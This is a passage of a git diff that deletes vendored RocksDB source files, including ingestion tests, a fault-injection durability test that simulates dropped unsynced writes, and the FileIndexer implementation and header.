-    ASSERT_OK(sst_file_writer.Put(Key(i), Key(i) + "_V2"));
-  }
-  ASSERT_OK(sst_file_writer.Finish());
-
-  IngestExternalFileOptions ifo;
-  ifo.move_files = true;
-  ASSERT_OK(db_->IngestExternalFile({sst_file_path}, ifo));
-
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_EQ(Get(Key(i), snap), Key(i) + "_V1");
-    ASSERT_EQ(Get(Key(i)), Key(i) + "_V2");
-  }
-
-  db_->ReleaseSnapshot(snap);
-}
-
-TEST_F(ExternalSSTFileTest, IngestBehind) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 3;
-  options.disable_auto_compactions = false;
-  DestroyAndReopen(options);
-  std::vector<std::pair<std::string, std::string>> file_data;
-  std::map<std::string, std::string> true_data;
-
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-
-  // Insert 100 -> 200 using IngestExternalFile
-  file_data.clear();
-  for (int i = 0; i <= 20; i++) {
-    file_data.emplace_back(Key(i), "ingest_behind");
-  }
-
-  IngestExternalFileOptions ifo;
-  ifo.allow_global_seqno = true;
-  ifo.ingest_behind = true;
-
-  // Can't ingest behind since allow_ingest_behind isn't set to true
-  ASSERT_NOK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-
-  options.allow_ingest_behind = true;
-  // check that we still can open the DB, as num_levels should be
-  // sanitized to 3
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  options.num_levels = 3;
-  DestroyAndReopen(options);
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // Universal picker should go at second from the bottom level
-  ASSERT_EQ("0,1", FilesPerLevel());
-  ASSERT_OK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-  ASSERT_EQ("0,1,1", FilesPerLevel());
-  // this time ingest should fail as the file doesn't fit to the bottom level
-  ASSERT_NOK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-  ASSERT_EQ("0,1,1", FilesPerLevel());
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // bottom level should be empty
-  ASSERT_EQ("0,1", FilesPerLevel());
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as External SST File Writer and Ingestion are not supported "
-          "in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/fault_injection_test.cc b/thirdparty/rocksdb/db/fault_injection_test.cc
deleted file mode 100644
index adfcb4d..0000000
--- a/thirdparty/rocksdb/db/fault_injection_test.cc
+++ /dev/null
@@ -1,547 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#include "db/db_impl.h"
-#include "db/log_format.h"
-#include "db/version_set.h"
-#include "env/mock_env.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "rocksdb/write_batch.h"
-#include "util/fault_injection_test_env.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-static const int kMaxNumValues = 2000;
-static const size_t kNumIterations = 3;
-
-class FaultInjectionTest : public testing::Test,
-                           public testing::WithParamInterface<bool> {
- protected:
-  enum OptionConfig {
-    kDefault,
-    kDifferentDataDir,
-    kWalDir,
-    kSyncWal,
-    kWalDirSyncWal,
-    kMultiLevels,
-    kEnd,
-  };
-  int option_config_;
-  // When need to make sure data is persistent, sync WAL
-  bool sync_use_wal_;
-  // When need to make sure data is persistent, call DB::CompactRange()
-  bool sync_use_compact_;
-
-  bool sequential_order_;
-
- protected:
- public:
-  enum ExpectedVerifResult { kValExpectFound, kValExpectNoError };
-  enum ResetMethod {
-    kResetDropUnsyncedData,
-    kResetDropRandomUnsyncedData,
-    kResetDeleteUnsyncedFiles,
-    kResetDropAndDeleteUnsynced
-  };
-
-  std::unique_ptr<Env> base_env_;
-  FaultInjectionTestEnv* env_;
-  std::string dbname_;
-  shared_ptr<Cache> tiny_cache_;
-  Options options_;
-  DB* db_;
-
-  FaultInjectionTest()
-      : option_config_(kDefault),
-        sync_use_wal_(false),
-        sync_use_compact_(true),
-        base_env_(nullptr),
-        env_(NULL),
-        db_(NULL) {
-  }
-
-  ~FaultInjectionTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  }
-
-  bool ChangeOptions() {
-    option_config_++;
-    if (option_config_ >= kEnd) {
-      return false;
-    } else {
-      if (option_config_ == kMultiLevels) {
-        base_env_.reset(new MockEnv(Env::Default()));
-      }
-      return true;
-    }
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    sync_use_wal_ = false;
-    sync_use_compact_ = true;
-    Options options;
-    switch (option_config_) {
-      case kWalDir:
-        options.wal_dir = test::TmpDir(env_) + "/fault_test_wal";
-        break;
-      case kDifferentDataDir:
-        options.db_paths.emplace_back(test::TmpDir(env_) + "/fault_test_data",
-                                      1000000U);
-        break;
-      case kSyncWal:
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      case kWalDirSyncWal:
-        options.wal_dir = test::TmpDir(env_) + "/fault_test_wal";
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      case kMultiLevels:
-        options.write_buffer_size = 64 * 1024;
-        options.target_file_size_base = 64 * 1024;
-        options.level0_file_num_compaction_trigger = 2;
-        options.level0_slowdown_writes_trigger = 2;
-        options.level0_stop_writes_trigger = 4;
-        options.max_bytes_for_level_base = 128 * 1024;
-        options.max_write_buffer_number = 2;
-        options.max_background_compactions = 8;
-        options.max_background_flushes = 8;
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      default:
-        break;
-    }
-    return options;
-  }
-
-  Status NewDB() {
-    assert(db_ == NULL);
-    assert(tiny_cache_ == nullptr);
-    assert(env_ == NULL);
-
-    env_ =
-        new FaultInjectionTestEnv(base_env_ ? base_env_.get() : Env::Default());
-
-    options_ = CurrentOptions();
-    options_.env = env_;
-    options_.paranoid_checks = true;
-
-    BlockBasedTableOptions table_options;
-    tiny_cache_ = NewLRUCache(100);
-    table_options.block_cache = tiny_cache_;
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    dbname_ = test::TmpDir() + "/fault_test";
-
-    EXPECT_OK(DestroyDB(dbname_, options_));
-
-    options_.create_if_missing = true;
-    Status s = OpenDB();
-    options_.create_if_missing = false;
-    return s;
-  }
-
-  void SetUp() override {
-    sequential_order_ = GetParam();
-    ASSERT_OK(NewDB());
-  }
-
-  void TearDown() override {
-    CloseDB();
-
-    Status s = DestroyDB(dbname_, options_);
-
-    delete env_;
-    env_ = NULL;
-
-    tiny_cache_.reset();
-
-    ASSERT_OK(s);
-  }
-
-  void Build(const WriteOptions& write_options, int start_idx, int num_vals) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-    for (int i = start_idx; i < start_idx + num_vals; i++) {
-      Slice key = Key(i, &key_space);
-      batch.Clear();
-      batch.Put(key, Value(i, &value_space));
-      ASSERT_OK(db_->Write(write_options, &batch));
-    }
-  }
-
-  Status ReadValue(int i, std::string* val) const {
-    std::string key_space, value_space;
-    Slice key = Key(i, &key_space);
-    Value(i, &value_space);
-    ReadOptions options;
-    return db_->Get(options, key, val);
-  }
-
-  Status Verify(int start_idx, int num_vals,
-                ExpectedVerifResult expected) const {
-    std::string val;
-    std::string value_space;
-    Status s;
-    for (int i = start_idx; i < start_idx + num_vals && s.ok(); i++) {
-      Value(i, &value_space);
-      s = ReadValue(i, &val);
-      if (s.ok()) {
-        EXPECT_EQ(value_space, val);
-      }
-      if (expected == kValExpectFound) {
-        if (!s.ok()) {
-          fprintf(stderr, "Error when read %dth record (expect found): %s\n", i,
-                  s.ToString().c_str());
-          return s;
-        }
-      } else if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "Error when read %dth record: %s\n", i,
-                s.ToString().c_str());
-        return s;
-      }
-    }
-    return Status::OK();
-  }
-
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("shift"), no_sanitize("signed-integer-overflow")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-  // Return the ith key
-  Slice Key(int i, std::string* storage) const {
-    int num = i;
-    if (!sequential_order_) {
-      // random transfer
-      const int m = 0x5bd1e995;
-      num *= m;
-      num ^= num << 24;
-    }
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%016d", num);
-    storage->assign(buf, strlen(buf));
-    return Slice(*storage);
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) const {
-    Random r(k);
-    return test::RandomString(&r, kValueSize, storage);
-  }
-
-  void CloseDB() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status OpenDB() {
-    CloseDB();
-    env_->ResetState();
-    Status s = DB::Open(options_, dbname_, &db_);
-    assert(db_ != nullptr);
-    return s;
-  }
-
-  void DeleteAllData() {
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    WriteOptions options;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(db_->Delete(WriteOptions(), iter->key()));
-    }
-
-    delete iter;
-
-    FlushOptions flush_options;
-    flush_options.wait = true;
-    db_->Flush(flush_options);
-  }
-
-  // rnd cannot be null for kResetDropRandomUnsyncedData
-  void ResetDBState(ResetMethod reset_method, Random* rnd = nullptr) {
-    env_->AssertNoOpenFile();
-    switch (reset_method) {
-      case kResetDropUnsyncedData:
-        ASSERT_OK(env_->DropUnsyncedFileData());
-        break;
-      case kResetDropRandomUnsyncedData:
-        ASSERT_OK(env_->DropRandomUnsyncedFileData(rnd));
-        break;
-      case kResetDeleteUnsyncedFiles:
-        ASSERT_OK(env_->DeleteFilesCreatedAfterLastDirSync());
-        break;
-      case kResetDropAndDeleteUnsynced:
-        ASSERT_OK(env_->DropUnsyncedFileData());
-        ASSERT_OK(env_->DeleteFilesCreatedAfterLastDirSync());
-        break;
-      default:
-        assert(false);
-    }
-  }
-
-  void PartialCompactTestPreFault(int num_pre_sync, int num_post_sync) {
-    DeleteAllData();
-
-    WriteOptions write_options;
-    write_options.sync = sync_use_wal_;
-
-    Build(write_options, 0, num_pre_sync);
-    if (sync_use_compact_) {
-      db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-    write_options.sync = false;
-    Build(write_options, num_pre_sync, num_post_sync);
-  }
-
-  void PartialCompactTestReopenWithFault(ResetMethod reset_method,
-                                         int num_pre_sync, int num_post_sync,
-                                         Random* rnd = nullptr) {
-    env_->SetFilesystemActive(false);
-    CloseDB();
-    ResetDBState(reset_method, rnd);
-    ASSERT_OK(OpenDB());
-    ASSERT_OK(Verify(0, num_pre_sync, FaultInjectionTest::kValExpectFound));
-    ASSERT_OK(Verify(num_pre_sync, num_post_sync,
-                     FaultInjectionTest::kValExpectNoError));
-    WaitCompactionFinish();
-    ASSERT_OK(Verify(0, num_pre_sync, FaultInjectionTest::kValExpectFound));
-    ASSERT_OK(Verify(num_pre_sync, num_post_sync,
-                     FaultInjectionTest::kValExpectNoError));
-  }
-
-  void NoWriteTestPreFault() {
-  }
-
-  void NoWriteTestReopenWithFault(ResetMethod reset_method) {
-    CloseDB();
-    ResetDBState(reset_method);
-    ASSERT_OK(OpenDB());
-  }
-
-  void WaitCompactionFinish() {
-    static_cast<DBImpl*>(db_->GetRootDB())->TEST_WaitForCompact();
-    ASSERT_OK(db_->Put(WriteOptions(), "", ""));
-  }
-};
-
-TEST_P(FaultInjectionTest, FaultTest) {
-  do {
-    Random rnd(301);
-
-    for (size_t idx = 0; idx < kNumIterations; idx++) {
-      int num_pre_sync = rnd.Uniform(kMaxNumValues);
-      int num_post_sync = rnd.Uniform(kMaxNumValues);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropUnsyncedData, num_pre_sync,
-                                        num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropUnsyncedData);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropRandomUnsyncedData,
-                                        num_pre_sync, num_post_sync, &rnd);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropUnsyncedData);
-
-      // Setting a separate data path won't pass the test as we don't sync
-      // it after creating new files,
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropAndDeleteUnsynced,
-                                        num_pre_sync, num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      // No new files created so we expect all values since no files will be
-      // dropped.
-      PartialCompactTestReopenWithFault(kResetDeleteUnsyncedFiles, num_pre_sync,
-                                        num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDeleteUnsyncedFiles);
-    }
-  } while (ChangeOptions());
-}
-
-// Previous log file is not fsynced if sync is forced after log rolling.
-TEST_P(FaultInjectionTest, WriteOptionSyncTest) {
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  // Block the job queue to prevent flush job from running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::HIGH);
-  sleeping_task_low.WaitUntilSleeping();
-
-  WriteOptions write_options;
-  write_options.sync = false;
-
-  std::string key_space, value_space;
-  ASSERT_OK(
-      db_->Put(write_options, Key(1, &key_space), Value(1, &value_space)));
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(db_->Flush(flush_options));
-  write_options.sync = true;
-  ASSERT_OK(
-      db_->Put(write_options, Key(2, &key_space), Value(2, &value_space)));
-  db_->FlushWAL(false);
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  ASSERT_OK(OpenDB());
-  std::string val;
-  Value(2, &value_space);
-  ASSERT_OK(ReadValue(2, &val));
-  ASSERT_EQ(value_space, val);
-
-  Value(1, &value_space);
-  ASSERT_OK(ReadValue(1, &val));
-  ASSERT_EQ(value_space, val);
-}
-
-TEST_P(FaultInjectionTest, UninstalledCompaction) {
-  options_.target_file_size_base = 32 * 1024;
-  options_.write_buffer_size = 100 << 10;  // 100KB
-  options_.level0_file_num_compaction_trigger = 6;
-  options_.level0_stop_writes_trigger = 1 << 10;
-  options_.level0_slowdown_writes_trigger = 1 << 10;
-  options_.max_background_compactions = 1;
-  OpenDB();
-
-  if (!sequential_order_) {
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({
-        {"FaultInjectionTest::FaultTest:0", "DBImpl::BGWorkCompaction"},
-        {"CompactionJob::Run():End", "FaultInjectionTest::FaultTest:1"},
-        {"FaultInjectionTest::FaultTest:2",
-         "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-    });
-  }
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  int kNumKeys = 1000;
-  Build(WriteOptions(), 0, kNumKeys);
-  FlushOptions flush_options;
-  flush_options.wait = true;
-  db_->Flush(flush_options);
-  ASSERT_OK(db_->Put(WriteOptions(), "", ""));
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:0");
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:1");
-  env_->SetFilesystemActive(false);
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:2");
-  CloseDB();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ResetDBState(kResetDropUnsyncedData);
-
-  std::atomic<bool> opened(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::Open:Opened", [&](void* arg) { opened.store(true); });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkCompaction",
-      [&](void* arg) { ASSERT_TRUE(opened.load()); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(OpenDB());
-  ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound));
-  WaitCompactionFinish();
-  ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_P(FaultInjectionTest, ManualLogSyncTest) {
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  // Block the job queue to prevent flush job from running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::HIGH);
-  sleeping_task_low.WaitUntilSleeping();
-
-  WriteOptions write_options;
-  write_options.sync = false;
-
-  std::string key_space, value_space;
-  ASSERT_OK(
-      db_->Put(write_options, Key(1, &key_space), Value(1, &value_space)));
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(db_->Flush(flush_options));
-  ASSERT_OK(
-      db_->Put(write_options, Key(2, &key_space), Value(2, &value_space)));
-  ASSERT_OK(db_->FlushWAL(true));
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  ASSERT_OK(OpenDB());
-  std::string val;
-  Value(2, &value_space);
-  ASSERT_OK(ReadValue(2, &val));
-  ASSERT_EQ(value_space, val);
-
-  Value(1, &value_space);
-  ASSERT_OK(ReadValue(1, &val));
-  ASSERT_EQ(value_space, val);
-}
-
-TEST_P(FaultInjectionTest, WriteBatchWalTerminationTest) {
-  ReadOptions ro;
-  Options options = CurrentOptions();
-  options.env = env_;
-
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-  WriteBatch batch;
-  batch.Put("cats", "dogs");
-  batch.MarkWalTerminationPoint();
-  batch.Put("boys", "girls");
-  ASSERT_OK(db_->Write(wo, &batch));
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  ASSERT_OK(OpenDB());
-
-  std::string val;
-  ASSERT_OK(db_->Get(ro, "cats", &val));
-  ASSERT_EQ("dogs", val);
-  ASSERT_EQ(db_->Get(ro, "boys", &val), Status::NotFound());
-}
-
-INSTANTIATE_TEST_CASE_P(FaultTest, FaultInjectionTest, ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/file_indexer.cc b/thirdparty/rocksdb/db/file_indexer.cc
deleted file mode 100644
index abfa7cf..0000000
--- a/thirdparty/rocksdb/db/file_indexer.cc
+++ /dev/null
@@ -1,214 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/file_indexer.h"
-#include <algorithm>
-#include <functional>
-#include "db/version_edit.h"
-#include "rocksdb/comparator.h"
-
-namespace rocksdb {
-
-FileIndexer::FileIndexer(const Comparator* ucmp)
-    : num_levels_(0), ucmp_(ucmp), level_rb_(nullptr) {}
-
-size_t FileIndexer::NumLevelIndex() const { return next_level_index_.size(); }
-
-size_t FileIndexer::LevelIndexSize(size_t level) const {
-  if (level >= next_level_index_.size()) {
-    return 0;
-  }
-  return next_level_index_[level].num_index;
-}
-
-void FileIndexer::GetNextLevelIndex(const size_t level, const size_t file_index,
-                                    const int cmp_smallest,
-                                    const int cmp_largest, int32_t* left_bound,
-                                    int32_t* right_bound) const {
-  assert(level > 0);
-
-  // Last level, no hint
-  if (level == num_levels_ - 1) {
-    *left_bound = 0;
-    *right_bound = -1;
-    return;
-  }
-
-  assert(level < num_levels_ - 1);
-  assert(static_cast<int32_t>(file_index) <= level_rb_[level]);
-
-  const IndexUnit* index_units = next_level_index_[level].index_units;
-  const auto& index = index_units[file_index];
-
-  if (cmp_smallest < 0) {
-    *left_bound = (level > 0 && file_index > 0)
-                      ? index_units[file_index - 1].largest_lb
-                      : 0;
-    *right_bound = index.smallest_rb;
-  } else if (cmp_smallest == 0) {
-    *left_bound = index.smallest_lb;
-    *right_bound = index.smallest_rb;
-  } else if (cmp_smallest > 0 && cmp_largest < 0) {
-    *left_bound = index.smallest_lb;
-    *right_bound = index.largest_rb;
-  } else if (cmp_largest == 0) {
-    *left_bound = index.largest_lb;
-    *right_bound = index.largest_rb;
-  } else if (cmp_largest > 0) {
-    *left_bound = index.largest_lb;
-    *right_bound = level_rb_[level + 1];
-  } else {
-    assert(false);
-  }
-
-  assert(*left_bound >= 0);
-  assert(*left_bound <= *right_bound + 1);
-  assert(*right_bound <= level_rb_[level + 1]);
-}
-
-void FileIndexer::UpdateIndex(Arena* arena, const size_t num_levels,
-                              std::vector<FileMetaData*>* const files) {
-  if (files == nullptr) {
-    return;
-  }
-  if (num_levels == 0) {  // uint_32 0-1 would cause bad behavior
-    num_levels_ = num_levels;
-    return;
-  }
-  assert(level_rb_ == nullptr);  // level_rb_ should be init here
-
-  num_levels_ = num_levels;
-  next_level_index_.resize(num_levels);
-
-  char* mem = arena->AllocateAligned(num_levels_ * sizeof(int32_t));
-  level_rb_ = new (mem) int32_t[num_levels_];
-  for (size_t i = 0; i < num_levels_; i++) {
-    level_rb_[i] = -1;
-  }
-
-  // L1 - Ln-1
-  for (size_t level = 1; level < num_levels_ - 1; ++level) {
-    const auto& upper_files = files[level];
-    const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-    const auto& lower_files = files[level + 1];
-    level_rb_[level] = static_cast<int32_t>(upper_files.size()) - 1;
-    if (upper_size == 0) {
-      continue;
-    }
-    IndexLevel& index_level = next_level_index_[level];
-    index_level.num_index = upper_size;
-    mem = arena->AllocateAligned(upper_size * sizeof(IndexUnit));
-    index_level.index_units = new (mem) IndexUnit[upper_size];
-
-    CalculateLB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->smallest.user_key(), b->largest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->smallest_lb = f_idx; });
-    CalculateLB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->largest.user_key(), b->largest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->largest_lb = f_idx; });
-    CalculateRB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->smallest.user_key(), b->smallest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->smallest_rb = f_idx; });
-    CalculateRB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->largest.user_key(), b->smallest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->largest_rb = f_idx; });
-  }
-
-  level_rb_[num_levels_ - 1] =
-      static_cast<int32_t>(files[num_levels_ - 1].size()) - 1;
-}
-
-void FileIndexer::CalculateLB(
-    const std::vector<FileMetaData*>& upper_files,
-    const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-    std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-    std::function<void(IndexUnit*, int32_t)> set_index) {
-  const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-  const int32_t lower_size = static_cast<int32_t>(lower_files.size());
-  int32_t upper_idx = 0;
-  int32_t lower_idx = 0;
-
-  IndexUnit* index = index_level->index_units;
-  while (upper_idx < upper_size && lower_idx < lower_size) {
-    int cmp = cmp_op(upper_files[upper_idx], lower_files[lower_idx]);
-
-    if (cmp == 0) {
-      set_index(&index[upper_idx], lower_idx);
-      ++upper_idx;
-      ++lower_idx;
-    } else if (cmp > 0) {
-      // Lower level's file (largest) is smaller, a key won't hit in that
-      // file. Move to next lower file
-      ++lower_idx;
-    } else {
-      // Lower level's file becomes larger, update the index, and
-      // move to the next upper file
-      set_index(&index[upper_idx], lower_idx);
-      ++upper_idx;
-    }
-  }
-
-  while (upper_idx < upper_size) {
-    // Lower files are exhausted, that means the remaining upper files are
-    // greater than any lower files. Set the index to be the lower level size.
-    set_index(&index[upper_idx], lower_size);
-    ++upper_idx;
-  }
-}
-
-void FileIndexer::CalculateRB(
-    const std::vector<FileMetaData*>& upper_files,
-    const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-    std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-    std::function<void(IndexUnit*, int32_t)> set_index) {
-  const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-  const int32_t lower_size = static_cast<int32_t>(lower_files.size());
-  int32_t upper_idx = upper_size - 1;
-  int32_t lower_idx = lower_size - 1;
-
-  IndexUnit* index = index_level->index_units;
-  while (upper_idx >= 0 && lower_idx >= 0) {
-    int cmp = cmp_op(upper_files[upper_idx], lower_files[lower_idx]);
-
-    if (cmp == 0) {
-      set_index(&index[upper_idx], lower_idx);
-      --upper_idx;
-      --lower_idx;
-    } else if (cmp < 0) {
-      // Lower level's file (smallest) is larger, a key won't hit in that
-      // file. Move to next lower file.
-      --lower_idx;
-    } else {
-      // Lower level's file becomes smaller, update the index, and move to
-      // the next the upper file
-      set_index(&index[upper_idx], lower_idx);
-      --upper_idx;
-    }
-  }
-  while (upper_idx >= 0) {
-    // Lower files are exhausted, that means the remaining upper files are
-    // smaller than any lower files. Set it to -1.
-    set_index(&index[upper_idx], -1);
-    --upper_idx;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/file_indexer.h b/thirdparty/rocksdb/db/file_indexer.h
deleted file mode 100644
index 1bef3aa..0000000
--- a/thirdparty/rocksdb/db/file_indexer.h
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <cstdint>
-#include <functional>
-#include <limits>
-#include <vector>
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class Comparator;
-struct FileMetaData;
-struct FdWithKeyRange;
-struct FileLevel;
-
-// The file tree structure in Version is prebuilt and the range of each file
-// is known. On Version::Get(), it uses binary search to find a potential file
-// and then check if a target key can be found in the file by comparing the key
-// to each file's smallest and largest key. The results of these comparisons
-// can be reused beyond checking if a key falls into a file's range.
-// With some pre-calculated knowledge, each key comparison that has been done
-// can serve as a hint to narrow down further searches: if a key compared to
-// be smaller than a file's smallest or largest, that comparison can be used
-// to find out the right bound of next binary search. Similarly, if a key
-// compared to be larger than a file's smallest or largest, it can be utilized
-// to find out the left bound of next binary search.
-// With these hints: it can greatly reduce the range of binary search,
-// especially for bottom levels, given that one file most likely overlaps with
-// only N files from level below (where N is max_bytes_for_level_multiplier).
-// So on level L, we will only look at ~N files instead of N^L files on the
-// naive approach.
-class FileIndexer {
- public:
-  explicit FileIndexer(const Comparator* ucmp);
-
-  size_t NumLevelIndex() const;
-
-  size_t LevelIndexSize(size_t level) const;
-
-  // Return a file index range in the next level to search for a key based on
-  // smallest and largest key comparison for the current file specified by
-  // level and file_index. When *left_index < *right_index, both index should
-  // be valid and fit in the vector size.
-  void GetNextLevelIndex(const size_t level, const size_t file_index,
-                         const int cmp_smallest, const int cmp_largest,
-                         int32_t* left_bound, int32_t* right_bound) const;
-
-  void UpdateIndex(Arena* arena, const size_t num_levels,
-                   std::vector<FileMetaData*>* const files);
-
-  enum {
